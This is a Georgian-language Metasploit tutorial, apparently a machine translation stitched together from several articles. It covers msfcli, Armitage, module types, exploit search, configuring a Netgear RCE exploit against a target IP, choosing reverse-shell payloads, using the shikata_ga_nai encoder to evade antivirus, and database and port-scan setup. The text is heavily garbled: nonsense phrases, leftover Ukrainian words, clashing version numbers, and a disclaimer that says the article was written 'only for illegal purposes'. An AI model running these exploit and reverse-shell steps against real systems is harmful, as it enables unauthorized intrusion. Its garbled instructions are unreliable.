დაღვრაზე თვალყურის დევნება Metasploit Framework-ის გამოყენებით. Metasploit ინსტრუქციები სტაგნაციიდან Metasploit kali ინსტრუქციები stasis-დან

ჩვენ დავწერეთ ბევრი სტატია ბოროტებაზე და ვიკორისტანზე მეტასპლოიტი, მათ შორის, თუ როგორ არ უნდა დაკარგოთ კვალი, საიტის შიდა არქიტექტურის განვითარება, ისევე როგორც უამრავი მოტყუების ფურცელი ბრძანებებსა და სკრიპტებზე.

ამ დამხმარე საშუალებით ჩვენ ვიწყებთ სტატიების ყოვლისმომცველ სერიას დაწყებისა და სწავლისთვის მეტასპლოიტი. ეს ძალიან მნიშვნელოვანი ნაწილია, მაგრამ საფუძვლები მოკლედ იქნება განხილული მეტასპლოიტი- ერთ-ერთი ყველაზე ძლიერი ჰაკერული პლატფორმა დედამიწაზე.

როგორ დააინსტალიროთ Metasploit

მეტასპლოიტი- პროექტი ღია კოდით, რომელიც დაშალა ჰაკერმა HD Moore-მ 2003 წელს. წერის დასაწყისი პერლ, მაგრამ 2007 წელს ნამუშევარი მთლიანად გადაიწერა რუბი. 2009 წელს განხორციელდა შესყიდვების რაოდენობა სწრაფი 7, კომპანია, რომელიც სპეციალიზირებულია ინფორმაციული უსაფრთხოების სერვისების მიწოდებაში, რომელიც ასევე აწარმოებს დაღვრის სკანერს Nexpose.

მეტასპლოიტივერსია 4.12 უკვე შედის განაწილების კომპლექტში Kali Linux . Იგივენაირად BackTrack. თუ ვიკორისტირებთ სხვა განაწილებას Linuxან კიდევ MaxOS, მაშინ გექნებათ საშუალება ეწვიოთ ამ საიტს სწრაფი 7.

როგორი ვიკორისტი ხარ? ფანჯრები, მაშინ თქვენც მოგიზიდავთ მეტასპლოიტისაიტიდან სწრაფი 7, მაგრამ ჩვენ არ გირჩევთ მის გაშვებას ფანჯრები. თქვენ, რა თქმა უნდა, შეგიძლიათ ამის გაკეთება მრავალი ფუნქციით, რომელსაც ჩვენ ვხედავთ ამ სტატიაში, უბრალოდ არ იმუშაოთ იქ.

მეტასპლოიტიარსებობს მრავალი ვერსია, მათ შორის Metasploit Pro(ძირითადად კომერციული ვერსია) და საზოგადოების გამოცემა(ბეზკოშტოვნა). დანარჩენის ღერძი უბრალოდ იქმნება კალი. ჩვენ კონცენტრირებულები ვართ საზოგადოების გამოცემა, რადგან ვფიქრობთ, რომ უმეტესობა არ იყიდით პრო ვერსიაღირებულება $30000.

Metasploit ვიკიმედიის მეთოდები

მეტასპლოიტივიკორისტი შეგიძლიათ რამდენიმე გზით. ყველაზე მოწინავე გზა, რომლის გამოყენებაც ყოველთვის შეგვიძლია, არის ინტერაქტიული კონსოლი. მეტასპლოიტი. ის გააქტიურებულია ბრძანების სტრიქონში msfconsole შეყვანით კალი. ასევე არსებობს მრავალი სხვა მეთოდი.

Msfcli

ყოველივე ამის შემდეგ, თქვენ შეგიძლიათ vicorsta მეტასპლოიტიბრძანების სტრიქონი კალიან რეჟიმში msfcli. ერთი შეხედვით ჩანს, რომ როცა კონსოლში ვართ, ბრძანების რიგებში გამარჯვებულები ვართ. სინამდვილეში, ჩვენ გვაქვს vikoryst ინტერაქტიული კონსოლი სპეციალური საკვანძო სიტყვებით და ბრძანებებით. როცა ვაკეთებთ msfcli, მაშინ ის რეალურად არის vikorist Linux ბრძანების ხაზი.

ყველა ხელმისაწვდომი ბრძანების შესახებ ინფორმაციის სანახავად msfcliაკრიფეთ კონსოლზე:

Kali > msfcli -h

ახლა მოდით ვიკონატი გამოიყენოს msfcliჩაწერეთ ბრძანება:

Kali > msfcli დატვირთვა = rhost = lhost =

De "E" - სტენოგრამა "Execute"-სთვის (ვიკონატი)

ჩვენს სტატისტიკას კარგი შედეგები აქვს ტვირთამწეობა(korisnyh navantazheni) ანტივირუსული პროგრამებისგან დასაცავად გამოიყენეთ vikoryst ბრძანება msfencodeі msfpayloadბრძანების მწკრივის რეჟიმში ( msfcli).

ვიკორისტანიდან არც თუ ისე შორს msfcliვისაც ისე არ ექცევიან, როგორც msfconsole, და გარშემორტყმულია ერთი ჭურვით, რაც შეუძლებელს ხდის რთული ექსპლოიტების მუშაობას.

არმიტაჟი

გსურთ გახდეთ ვიკორისტი? მეტასპლოიტიგრაფიკული ინტერფეისით (GUI), არსებობს მრავალი ვარიანტი. მაგალითად, რაფაელ მუჯი არმიტაჟი(ასე ჰქვია მთავარ პერსონაჟს დიდ ორიგინალურ სამეცნიერო ფანტასტიკურ წიგნში კიბერჰაკერების შესახებ "Neuromancer". მისი წაკითხვა შეუძლია კანის ჰაკერს, რომელიც იმსახურებს ჟანრს. Სამეცნიერო ფანტასტიკა).

მოდით გავუშვათ არმიტაჟიკალი, უბრალოდ შეიყვანეთ:

კალი > არმიტაჟი

იაკშჩო არმიტაჟითუ არ შეგიძლიათ დაკავშირება, მაშინ სცადეთ ეს სხვა ბრძანებები:

Kali > სერვისის დაწყება postgresql kali > სერვისის დაწყება metasploit kali > სერვისის გაჩერება metasploit

არმიტაჟი- ეს გრაფიკული ინტერფეისი თავზე მეტასპლოიტისაჭიროებები კლიენტ-სერვერის არქიტექტურაზე. თქვენ გაუშვით მეტასპლოიტიროგორც სერვერი, ი არმიტაჟიხდება თქვენი კლიენტი, გაძლევს საჯარო წვდომაფუნქციონირებს მეტასპლოიტისრულად ფუნქციონალური, თუმცა არა ინტუიციურად ინტელექტუალური დახმარებისთვის GUI. მართლა რა გჭირდება? GUI, რომ თავი კომფორტულად იგრძნოს, მაშინ, კეთილად, ვიკორისტი არმიტაჟი. მაგრამ ბრძანების ხაზში ყოფნა პრაქტიკული აუცილებლობაა ნებისმიერი ჰაკერისთვის, რომელიც პატივს სცემს საკუთარ თავს.

მოდულები

მეტასპლოიტიარსებობს ექვსი განსხვავებული მოდული:

  1. ტვირთამწეობა
  2. ექსპლოიატებს
  3. პოსტი
  4. არა
  5. დამხმარე
  6. შიფრები

ტვირთამწეობა- ეს არის კოდი, რომელსაც ჩვენ ვკარგავთ ბოროტ სისტემაზე. ხალხი მათ მსმენელებს, rootkits-ს და ა.შ. უ მეტასპლოიტისუნკებს payload (ყავისფერი navantazhenny) უწოდებენ. ტვირთამწეობაჩართეთ ბრძანების ხაზის კომუნალური პროგრამები, მრიცხველიდა ა.შ. ტვირთამწეობაშენ ხარ ბუმი განსხვავებული ტიპებიმაგალითად, დადგმული, ხაზში, NoNX(გააქტიურებისთვის გვერდის ავლით „No Execute“ ფუნქცია მიმდინარე პროცესორები), PassiveX(გვერდის ავლით Firewall-ის წესების შესახებ გამავალი ტრაფიკი), IPv6და სხვა.

ექსპლოიტები- ეს არის shellcode, რომელიც არის მანკიერი გავლენა და ხარვეზები სისტემაში. ეს არის ძალიან კონკრეტული კოდი. მაგალითად, არის ექსპლოიტები ოპერაციული სისტემისთვის, სერვის პაკეტებისთვის (SP), კონკრეტული სერვისებისთვის, პორტებისთვის და დანამატებისთვის. ისინი ასევე შეიძლება დაიყოს ტიპებად ოპერატიული სისტემაეს ექსპლუატაციაა ფანჯრებიარ იმუშაო Linuxდა შემთხვევით.

პოსტი- ეს ის მოდულებია, რომლებიც შეიძლება გამოყენებულ იქნას სისტემაზე პოსტ-ექსპლოატაციის შეტევებისთვის (სისტემაზე წვდომის აკრძალვის შემდეგ).

არა- მოკლე ვერსია No OperationS. x86 ოჯახის პროცესორებისთვის იგი მითითებულია როგორც თექვსმეტობითი 0x90. ეს უბრალოდ ნიშნავს "არ შეწუხდე არაფრის კეთებას". ამას შეიძლება უფრო დიდი მნიშვნელობა ჰქონდეს ბუფერული გადასვლის შეტევებისთვის. ჩვენ შეგვიძლია შევხედოთ მოდულებს არადარეკეთ დახმარებისთვის შოუ.

Msf> nops-ის ჩვენება

Დამხმარე- მოიცავს უამრავ მოდულს (695), რომლებიც არ ჯდება რომელიმე სხვა კატეგორიაში. მათ წინაშე არის ისეთი რამ, როგორიცაა ფუზერები, სკანერები, მოდულები DoS შეტევებისთვის (მომსახურებაში VMware) და მრავალი სხვა. უფრო დაწვრილებითი ინფორმაციისთვის მე გიგზავნით ჩვენს სტატიას ამის შესახებ Დამხმარემოდულები.

შიფრები- ეს მოდულები საშუალებას გვაძლევს დავაშინოთ ჩვენი დატვირთვა სხვადასხვა გზით, ანტივირუსული პროგრამებისა და უსაფრთხოების სხვა სისტემების გვერდის ავლით. ჩვენ შეგვიძლია მივიღოთ ეს კოდები აკრეფით:

Msf>კოდერების ჩვენება

როგორ ლაპარაკობ, ოჰ მეტასპლოიტიიძულებული გავხდი უამრავ კოდერზე მემუშავა. ჩვენი ერთ-ერთი ფავორიტი - შიკატა_გა_ნაი. Vіn გაძლევთ vikorist ტვირთამწეობა XORრაც მოტყუებას უწყობს ხელს ანტივირუსული პროგრამებიდა უსაფრთხოების სხვა სისტემები.

ძიება

მეტასპლოიტი 4 გაჩნდა ძებნის შესაძლებლობა. ადრე მქონდა შანსი გავმხდარიყავი ვიკორისტი msfcliიმ გუნდს grepიცოდე მოდულები. ახლა სწრაფი 7საკვანძო სიტყვებისა და სხვა ფუნქციების ძიების დამატება. ძიებას კიდევ უფრო უახლესი, ფრაგმენტების დამატება მეტასპლოიტიძალიან გავიზარდე, მაგრამ ახლა კითხვებს ვეძებ grepაღარ იყო საკმარისი 1400-ზე მეტი ექსპლოიტის ცოდნა.

საკვანძო სიტყვების ძიება საშუალებას გაძლევთ ან მოძებნოთ მარტივი ძიება ან მოძებნოთ უფრო დეტალური ძიება. მაგალითად, ჩვენ შეგვიძლია განვსაზღვროთ მოდულის ტიპი, რომელიც უნდა იცოდეთ, vikori საკვანძო სიტყვატიპი:

Msf > ძებნის ტიპი: ექსპლოიტი

იაკშჩო მი წე ზრობიმო, მერე მეტასპლოიტიმოგვეცით 1295 ექსპლოიტი. არც კორისნი.

ჩვენ ვიცით, რომ მანქანაზე თავდასხმა გვინდა Sun Microsystemsკერუვანიამთან ახლოს სოლარისი (Sun UNIX), მაშინ ჩვენ შეგვიძლია დავაზუსტოთ ჩვენი ძებნა და მოვიძიოთ მხოლოდ ექსპლუატაციისთვის სოლარისი. რატომ გვჭირდება საკვანძო სიტყვის ძებნა? პლატფორმა.

Msf > ძებნის ტიპი:ექსპლოიტის პლატფორმა:solaris

ახლა ჩვენ მოვისმინეთ ჩვენი ძებნა ამ რამდენიმე ექსპლოიტის წინააღმდეგ, რომლებიც მოქმედებენ სოლარისი.

დამატებითი განმარტებისთვის მისაღებია მოძებნოთ ის, რისი შეტევაც გვინდა Solaris RPC (sunrpc) და, ცხადია, ჩვენ უნდა ავიცილოთ თავიდან ექსპლოიტები, რომლებიც თავს ესხმიან ამ კონკრეტულ სერვისს. ჩვენ ვამატებთ საკვანძო სიტყვას " sunrpc"ჩვენში ხმის სიგნალი ჩართულია, როგორც ქვემოთაა ნაჩვენები:

Msf > ძებნის ტიპი:ექსპლოიტის პლატფორმა:solaris sunrpc

როგორც ხედავთ, აქ არის ძიების შედეგები ხუთამდე ექსპლოიტის მოდულისთვის!

მეტასპლოიტიარსებობს უამრავი შესაძლებლობა, რომელთა ნახვა შეგვიძლია მომავალ სტატიებში მეტასპლოიტი. სცადეთ რამდენიმე ჰაკი ახლა მეტასპლოიტირა არის აღწერილი საიტზე სხვა პოსტებში. Შემობრუნდი! ვივჩიტე მეტასპლოიტიდა დაიწყე ბოროტების კეთება პროფესიონალივით!

ვიდმოვას პასუხისმგებლობა: ეს სტატია დაიწერა მხოლოდ უკანონო მიზნებისთვის ავტორს არასოდეს გამოუქვეყნებია ეს სტატია უკანონო მიზნებისთვის. თუ მკითხველს სურს სწრაფად მოიპოვოს ინფორმაცია საკუთარი სარგებლისთვის, მაშინ ავტორი აშკარად არ აგებს პასუხისმგებლობას რაიმე ბოროტმოქმედებაზე ან ცუდზე.

რა არის მეტასპლოიტი?

მეტასპლოიტი(და სწორია ლაპარაკი metasploit-ზე, როგორც პროექტზე) - თავად პროექტი არის კომპიუტერული უსაფრთხოების დეპარტამენტიდან, რომელიც აწვდის ინფორმაციას დაინტერესებულ მხარეებს (განსაკუთრებით მთავრობის წარმომადგენლებს, დისტრიბუტორებს და ადმინისტრატორებს) და რესურსების ერთობლიობას უსაფრთხოების სისტემაში შესაძლო დაღვრის შესახებ და ეხმარება სისტემების ტესტირებას და გაზომვებს კარების დახურვით ისინი უსაფრთხო და დაცული იყვნენ. მეტაექსპლოიტების შესამუშავებლად არის სპეციალური საშუალება ე.წ Metasploit Framework. დანარჩენი გადაიქცა საკუთარ ქვეპროექტად, რომელიც არის პროგრამული შუალედური პროგრამა და პლატფორმა დისტანციურ მანქანაზე ექსპლოიტების შემუშავებისა და განვითარებისთვის. პლატფორმის კვების სიძლიერე და მთლიანად პროექტის სტაგნაცია დარჩება ლორწოვანი, შუა ფრაგმენტები, დაწკაპუნებული საბოლოო აქტივობის განხორციელებამდე. სისტემის ადმინისტრატორებიუსაფრთხოების ზომები წარმატებით გამოიყენება ჰაკერების მიერ, რათა განავითარონ და განავითარონ ახალი ექსპლოიტები რესურსებზე არაავტორიზებული წვდომის აკრძალვის მიზნით.

Metasploit Framework 2003 წელს გაშვების შემდეგ, მან განიცადა გარკვეული ცვლილებები და ჩვენთან მოვიდა ძალიან გაფართოებული ლიცენზიით, როგორც უფასო, ასევე კომერციული ვერსიებისთვის. ვარიანტები მოიცავს უამრავ მზა ექსპლოიტს, რომელიც დაგეხმარებათ გამოვლენილ პრობლემებთან გამკლავებაში. მუშაობს უპრობლემოდ Unix-ზე ვინდოუსის სისტემებიბრაუზერის ფანჯარასთან ახლოს არის რამდენიმე ინტერფეისი, რომლიდანაც უნდა აირჩიოთ.

როგორ გამოვიყენოთ Metasploit Framework, ან რა არის metasploit? საშუალო კურსის ძირითადი პრინციპები.

შუაში მუშაობის დაწყებამდე აბსოლუტურად აუცილებელია რაც შეიძლება მეტი ინფორმაციის შეგროვება კომპიუტერის შესახებ, ასე რომ თქვენ უნდა გაიაროთ მთელი რიგი ნაბიჯები, ასე რომ თქვენ უნდა იმუშაოთ ექსპლოიტისა და დატვირთვის არჩევანზე.

როგორ გამოვიყენოთ Metasploit Framework?

ეს ღერძი აქ არის:

https://www.metasploit.com/download/

ალე, ნუ ჩქარობ. პლატფორმა ასევე მოიცავს სისტემური შეკრებების ფართო არჩევანს, რომელიც შეიძლება ფართოდ გავრცელდეს უფასო და უფასო ლიცენზიით. ჩვენ ამას ვიცნობთ ბლოგის გვერდზე Linux-ის განყოფილებაში. სანამ საწყობი ბევრ ექსპერიმენტში მიიღებს მონაწილეობას, შუაში შესვლა აბსოლუტურად უსაფრთხოა.

ერთმანეთის გაცნობა შელ.

ეს დამოკიდებულია ექსპლოიტის ტიპზე, რის შემდეგაც ექსპლოიტი ინტეგრირებულია ცხოვრებაში, ჩვენ შეგვიძლია დავინახოთ მარჯვნივ ან დისტანციური ჭურვით ( დისტანციური ჭურვი) ეს მეტრიანი ჭურვი ( მრიცხველის ჭურვი).

დამატებულია ჭურვიკომპიუტერული პროგრამაბრძანების სტრიქონიდან (ტერმინალიდან), რომელშიც შეგიძლიათ შეიყვანოთ ბრძანებები დისტანციურ კომპიუტერზე, რაც არ უნდა იყოთ თქვენი კლავიატურის უკან. ეს არის სამუშაო მაგიდა (როგორც Windows-ს უწოდებენ). სტანდარტული გარსი ჩერდება იმ შემთხვევებში, როდესაც ჰაკერი აპირებს დაზარალებულის კომპიუტერზე სტანდარტული ბრძანებების დაყენებას. თუმცა, საუბარია მიმდინარე სესიაზე რთულ მანიპულაციებზე და ბრძანებების ფორმირებაზე დამატებითი ნიშნებით, რომლებიც იქნება vicoristano shell Meterpreter.

მეტრი-ჭურვიცოტა მეტი. მრიცხველის ჭურვიის უკვე წარმოგიდგენთ მზა პროგრამული გადაწყვეტილებების მთელ პაკეტს. ეს მოიცავს კომუნალურ და სკრიპტებს ინფორმაციის შეგროვებისთვის დისტანციურ კომპიუტერზე, მოწყობილობების მონიტორინგისთვის, როგორიცაა მიკროფონები და ვებკამერები და ა.შ. და ტექნოლოგიების განვითარებასთან ერთად, იზრდება ინტერესი მზა გადაწყვეტილებების მიმართ, რომლებიც მზარდი და სრულყოფილნი არიან და სხვა. ახლა კი ცოტა მეტი ყველაფრის აღწერის შესახებ.

მოძებნეთ ექსპლოიტის კონფიგურაცია

ვაფასებ, რომ უკვე კალიში ხარ. ჩვენ გავუშვით Metasploit და ვაძლევთ ბრძანებას ხელმისაწვდომი ექსპლოიტების ჩვენების შესახებ. ცე გუნდი

ტერმინალი აჩვენებს ინფორმაციას ექსპლოიტების შესახებ ანბანური თანმიმდევრობით. არ დაგავიწყდეთ ხელით, ძიების გარკვევა შესაძლებელია საძიებო ნიშნებით:

  • ზაგალნიეს ხრიკების ლექსიკონი და დახურული ხვრელები ბეზპეტებში ( CVE ID). შეგიძლიათ დაუყოვნებლივ შეიყვანოთ შემდეგი:
ძებნა cve:2017

  • Microsoft Security Bulletin
ძებნა MS
  • ბაჟანა პროგრამის ან virobnik PZ-ის უკან ან დავამატებ
მოძებნეთ Netgear

  • და ნიშნის არჩევის შემდეგ, ამ დისკიდან ამოიღეთ ყველა ინფორმაცია დაღვრამდე, რომელიც დამატებულია დაღვრამდე. ინფორმაცია(ამ საკვების შესახებ დამატებითი ინფორმაციისთვის შეტყობინებები იქნება იმავე ტერმინალებში). Შეხედე:

იქ ყველაფერი ამოწმებს თქვენს ანალიზს და სტაგნაციას. მანამდე, როგორ შევიდეთ ექსპლოიტის კონფიგურაციაში, ავიღოთ რაუნდში დაღვრა ბრძანებით გამოყენება

ან, ერთ-ერთ წინა ფანჯრისკენ მიბრუნებით, გამოავლინეთ შემდეგი ექსპლოიტი, სანამ არ აითვისებთ მას და გაყინავთ:

და ჩვენ შეგვიძლია დაუყოვნებლივ გადავამოწმოთ, თუ როგორ უნდა შემოვიფარგლოთ იგი და რამდენად მივამაგროთ იგი, ჩვენთვის ცნობილი ვიკორისტი და პრაპორშჩიკი ინფორმაციაექსპლოიტის კონტექსტში:


ექსპლოიტის კონფიგურაცია: დაინსტალირებული ოფციები

ჩვენი გუნდი დაგვეხმარება მეტასპლოიტის სწორი მიმართულებით წარმართვაში კომპლექტი . გუნდი შევიდა msfმე შემიძლია ამის ნახვა მომავალში

დააყენეთ name_change_value

იმის გასარკვევად, თუ რა ცვლილებებია ექსპლუატაციისთვის, შეგიძლიათ გამოიყენოთ ბრძანება პარამეტრების ჩვენება

როზდილი მოდულის პარამეტრებიჩვენთვის ცნობილი სარდლობის სამხედრო სამსახურიდან პრაპორშჩიკით ინფორმაცია, გვიჩვენებს, თუ როგორ შეიძლება დაყენდეს კონფიგურაცია მოწყობილობის არჩევისას. ამრიგად, მოდული დაუყოვნებლივ მიუთითებს მათ, ვინც იყენებს სტაგნაციას დაღვრაზე ამ სავალდებულო ვარიანტების სტაგნაციის გამო (მზად არის პრაპორშჩიკის სანახავად სამუშაომდე). დიახ, რა არის არათქვენ ჯერ არ შეხვედით). პენტესტერი ექსპლუატაციისთვის გამოსაყენებლად გამოიყენეთ შემდეგი:

  • დისტანციური სისტემის მისამართები ( RHOST)
  • დისტანციური პორტი 8080 ( RPORT)
  • როგორც მეტა დეტექტორი ( ტარგეტური) – სისტემაში სტაგნაციის გზა ან მსხვერპლის საკუთრებაში მიმავალი გზა (მაგალითად, თუ როუტერს თავს დაესხნენ, აქ ახალი გზა მითითებულია დაღვრილი ფაილის ხილულ მისამართზე)

ნახატი რუჯით დავასრულოთ. ექსპლოიტის გაშვება ჩვენს Wi-Fi ბალიშში ასე გამოიყურება:

Exploit(netgear_nms_rce) გამოიყენე msf exploit(netgear_nms_rce) ნაკრები RHOST 10.10.10.10 კომპლექტი RPORT 8080 კომპლექტი TARGETURI ექსპლოიტი -j

გემოვნებისთვის, ზემოთ აღწერილი ბრძანებები არ არის საჭირო. უფრო დეტალურ ინფორმაციას მოგვიანებით მოგაწვდით.

ვიბირი და ჩამოსხმის დატვირთვა

გვჭირდება წვდომა სხვის კომპიუტერზე, რადგან იქ ვერაფერს ვიღებთ? და ამ მიზნით დაგჭირდებათ ტვირთამწეობა. ისევე როგორც metasploit, payload არის უსარგებლო პროგრამული უზრუნველყოფის ნაწილი, რომელიც შექმნილია სისტემის ფუნქციონირების შესაცვლელად. ამ დროს, როგორც პროგრამული უზრუნველყოფის სხვა ნაწილი შეიძლება პირდაპირ დაფუძნდეს დამატებით ფუნქციებზე (მაგალითად, საკუთარი თავის კოპირება და რეპროდუცირება; mova go about კომპიუტერული ვირუსი). როგორც თქვენ წარმოიდგინეთ, დატვირთვა შეიძლება დაიყოს ერთ კოდად და გაერთიანდეს სხვადასხვა ვარიანტებთან.

Metasploit-ის შუაგულში მუშაობისას თქვენ შეგიძლიათ გაოცდეთ მზა დატვირთვის ვარიანტებით ასი არჩეული ექსპლოიტისთვის. იყავით მორცხვი, როგორც გუნდი

დატვირთვის ჩვენება

თქვენ მიერ არჩეული ექსპლოიტის ვარიანტი. კიდევ ერთი ვარიანტია ჩაწერა არჩეულ ექსპლოიტზე

დატვირთვის დაყენება

და ის უზრუნველყოფილია ღილაკის ორჯერ დაჭერით ჩანართი. Metasploit გეკითხებათ თუ არ გინდათ საერთოდ შეხედოთ... Paylouds. მე ჩართეთ Metasploit ტერმინალი, აჩვენოს ინფორმაცია იტვირთება ფორმატში ოპერაციული სისტემა/შლის ტიპიოპერაციული სისტემა/Shell ტიპის. Მაგალითად

დააყენეთ payload/windows/shell_reverse_tcp

თქვენ ვერ შეძლებთ აირჩიოთ თქვენთვის შესაფერისი ოპერაციული სისტემა და დატვირთვის ტიპი. ტვირთის ყველაზე პოპულარული ტიპები იგივეა, რაც ჭურვები, რომლებზეც უფრო ხშირად ვისაუბრეთ (ამოღება და თარჯიმანი ან მეტრი-შელი).

შუა პროგრამული უზრუნველყოფის ქეშიდან payload-ების არჩევანი კიდევ უფრო ფართოა. ასე რომ, ისევე, როგორც ღირებულების არჩევა, დამატებითი დახმარებისთვის, მსხვერპლის სისტემა ჰაკერს „ეღვრება“. მოთხოვნილი ინფორმაცია. ტიპიური ჭურვები ბაზაზე reverse_tcpბრძანებები ყველაზე მნიშვნელოვანია ამ მიზნისთვის: დისტანციურ სისტემაში შესვლით, ისინი აცნობებენ თავდამსხმელს მონაცემებს, ხშირად სისტემის ფეიერვოლზე ეჭვის გაჩენის გარეშე.

Ნახვამდის. Წარმატებები

მსოფლიოში 7 წლის წინ გამოჩენის შემდეგ, MSF გადაკეთდა სამუშაო შენადნობების დაწერის მარტივი ჩარჩოდან ერთგვარ „შვეიცარიულ დანად“, ახლა კი პენტესტების ჩატარების მთელ ოსტატად, მათ შორის ყველაფერი საჭირო - ინფორმაციის შეგროვებისთვის ї ცვლილებამდე. ექსპლუატაციის შემდგომი მეთოდების შესახებ. ტყუილად არ არის, რომ MSF-ს შეუძლია შეიყვანოს ხუთამდე ყველაზე ხშირად გამოყენებული ინსტრუმენტი. და რატომაც არა - MSF გააგრძელებს ზრდას და განვითარებას! და ნებისმიერი პირდაპირი გზით - თქვენ იცით ამ სტატიიდან.

თავდაპირველად, სტატია გამიზნული იყო MSF-ში მოქმედებების ავტომატიზაციის შესაძლებლობების აღსაწერად, მაგრამ ჩარჩოს შესახებ ხალხის ცოდნის გაანალიზების შემდეგ, სავარაუდოდ, გამოვლინდებოდა მისი მეტ-ნაკლებად შთაგონებული შესაძლებლობების შესახებ და ეს იქნება მისი ავტომატიზაციის შესახებ. თქვა გზაში. უბრალოდ ხალხი ველოსიპედს არ უნდა ატარებდეს :).

სანამ ვისაუბრებთ, ცოდნაზე. გასაკვირი არ არის, რომ არც თუ ისე ბევრი მათგანია, რადგან ინგლისურ ენაზე არ არსებობს ყოვლისმომცველი სტატიები/წიგნები Metasploit-ის შესახებ. ასე რომ, ინფორმაციის ძირითადი წყაროა უცხოური ბლოგები და ინდივიდუალური კვლევები. გარდა ამისა, გაჩუმდით, რადგან რუბი მარტივია და სხვისი დუნდულების მიღმა შეგიძლიათ ისწავლოთ საკუთარი უნარები.
Ნახვამდის! ყველაფერი აღწერილი უშედეგოა დარჩენილი ვერსია- MSF 3.4.2.

GUI ბრუნავს!

მათთვის, ვისაც არ მოსწონს კონსოლი ან ძალიან ეზარება MSF ბრძანებების გაგება, არსებობს GTK-ზე დაფუძნებული გარსი. უფრო სწორედ, მივხვდი, რომ ფრაგმენტები 3.3 ვერსიით იყო მოკლული. წყალობა არ მაქვს, msfweb-ზეც იგივე მოხდა. ეგოისტი მაინც შეიძლება გახდე, თორემ სტაბილურობასთან დაკავშირებული პრობლემები იქნებოდა, მაგრამ აქ... ეჰ!

მაგრამ სტატიის მომზადების საათამდე კარგი იყო - ახალი ბატი. შეცვლილია შუაშიც და შუაშიც. უფრო ზუსტად რომ ვთქვათ, ის იწერება Java-ში, ამიტომ არის კროს-პლატფორმული და ასევე ურთიერთქმედებს MSF-თან XMLRPC ინტერფეისის საშუალებით, ასე რომ თქვენ შეგიძლიათ მისი დისტანციურად რედაქტირება.

პროგრამის გაშვება ხდება ორ ეტაპად: დაწყებული msfrpcd-ით, შემდეგთან დაკავშირება msfgui-ის საშუალებით. msfgui-ით, რომელიც მუშაობს თქვენს სერვერზე, შეგიძლიათ უბრალოდ აკრიფოთ „დაიწყე ახალი msfprcd“

Win ვერსია:

  1. Cygwin კონსოლის გაშვება
  2. cd /msf3
  3. msfrpcd -S -U მომხმარებლის სახელი -P პაროლი de -S - SSL კავშირი და შექმენით შესვლა/გადასასვლელი
  4. გაუშვით msfgui.jar, რომელიც ინახება %MSF%\msf3\data\gui-ში ორმაგი დაწკაპუნებით ან კონსოლში (არა cygwin): java –jar msfgui.jar

msfgui-ზე შეიყვანეთ შესვლა/პასი, პორტი, IP და დაკავშირება.

რაღაც, როგორც ჩანს, ძველ დროში არ იზრდება. მაგალითად, კონსოლზე წვდომა ან ჟურნალების ნახვა. თქვენ ასევე შეგიძლიათ ამის გაკეთება, განსაკუთრებით თუ გჭირდებათ სწრაფად ნავიგაცია დანამატებში, მოდულებში, სხვის კომპიუტერზე სერფინგი და ა.შ.

ინფორმაციის შეგროვება

თქვენ შეიძლება იცოდეთ, რომ MSF მუშაობს მონაცემთა ბაზაზე, რათა შეინახოს ინფორმაცია, რომელიც გაცვლა ხდება მის მოდულებს შორის. და ეს აქტიურად ვითარდება.

უმეტესწილად, მონაცემთა ერთადერთი მხარდაჭერილი არის PostgreSQL. მიუხედავად იმისა, რომ SQLite-მა ისარგებლა პროდუქტიულობის/მაშტაბურობის საკითხებით, MySQL ახლა შეუფერხებლად წავიდა. თუმცა, Postgres-ის ინსტალაცია არ არის დამნაშავე პრობლემებში. კომუნიკაციის დრაივერი ჩაშენებულია MSF-დან.

Win: დააყენეთ, დააყენეთ საშვი კლიენტისთვის - პოსტგრესი და პორტი.

pgAdmin-ის საშუალებით: ჩვენ ვუკავშირდებით ლოკალურ სერვერს, ვქმნით სხვა მომხმარებელს „Roles for Login“ (msf_user), ვქმნით მონაცემთა ბაზას „Base“-ში (msf_db). აქ თქვენ ასევე შეგიძლიათ დააკონფიგურიროთ SQL სერვერი, შექმენით იგი "უსაფრთხო" და ნავიგაცია MSF ცხრილებში.

msf> db_driver postgresql
msf> db_connect msf_user: [ელფოსტა დაცულია]:5432/msf_db

ახლა db_create ბრძანება არ მუშაობს განურჩევლად, თქვენ შეგიძლიათ დაუკავშირდეთ მხოლოდ თავდაპირველ მონაცემთა ბაზას და, რადგან თქვენ გაქვთ პრივილეგიები (როგორც პოსტგრესის მომხმარებელი), მონაცემთა ბაზა ავტომატურად შეიქმნება. წინააღმდეგ შემთხვევაში, შექმენით მონაცემთა ბაზა ხელით Postgres-ით.

მაგრამ ეს არც ისე საშინელია, თქვენ ასევე შეგიძლიათ გამოიყენოთ სამუშაო ადგილები. არის ერთი მონაცემთა ბაზა, თავად ცხრილები, მაგრამ მოდულები ცვლის/ამატებს ინფორმაციას ნაკადის სივრცეში. თუ ცდები, გესმის, db_workspace დაგეხმარება.

მოდით, ერთი წუთით გავარკვიოთ ბრძანებები:

  • db_service – აჩვენებს ინფორმაციას პორტების/სერვისების შესახებ, რომლებიც დასკანირებულია მოდულებით, ან იმპორტირებული nmap-ით, ან იმპორტირებულია მესამე მხარის პროგრამები. ამის საფუძველზე db_autopwn მუშაობს –p პარამეტრით (პორტების მიხედვით);
  • db_notes – „შენიშვნები“, OS-ის ვერსიის ტიპი, ამოღებული Nmap-დან, ან „დეტალები“, ამოღებული WMap-დან. სამწუხაროა, მაგრამ db_autopwn, როგორც ჩანს, არ გაუკვირდება db_notes-ს სპლოიტის არჩევისას.
  • db_vulns – ხარვეზები, რომლებიც ნაპოვნია MSF მოდულების (WMap), ან Nessus-ის იმპორტის (OpenVAS), Nexpose-ის მიერ. ამის საფუძველზე, db_autopwn გაშვებულია -x პარამეტრით (სპილოვერისთვის).

მაგალითად, ჩვენ ვამოწმებთ ჰოსტს nmap-ით და ვუგზავნით შედეგებს ჩვენს მონაცემთა ბაზაში:

msf> db_nmap -PN -sV 192.168.0.101

MSF-ით პორტის სკანერის მოდულის ჩანთა მსგავსი იქნება და მონაცემები ასევე გადავა მონაცემთა ბაზაში. ღერძი მხოლოდ კონკრეტული სერვისებისთვის მოითხოვს სხვა მოდულების გამოყენებას (ყველა aux-მოდული, რომელსაც აქვს ვერსია ბოლოს სკანერის განყოფილებაში, მაგალითად, scanner/imap/imap_verison).

msf> გამოიყენეთ სკანერი/პორტსკანი/tcp
msf> კომპლექტი RHOSTS 192.168.0.101
msf> დააყენეთ PORTS 1-1000
msf> run -j

